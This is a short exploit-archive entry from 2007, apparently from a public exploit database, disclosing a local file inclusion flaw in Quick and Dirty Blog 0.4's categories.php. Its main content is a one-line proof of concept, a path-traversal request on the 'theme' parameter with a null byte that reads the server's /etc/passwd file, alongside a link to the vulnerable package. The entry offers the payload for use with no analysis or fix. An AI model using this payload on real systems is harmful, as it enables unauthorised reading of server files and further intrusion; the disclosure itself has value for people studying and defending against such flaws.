Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vuln
# Published : 2007-11-03
# Author : GoLd_M
# Previous Title : GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability
# Next Title : scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vuln

Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2
POC:
  /categories.php?theme=../../../../../../../../../etc/passwd%00

# www.Syue.com [2007-11-03]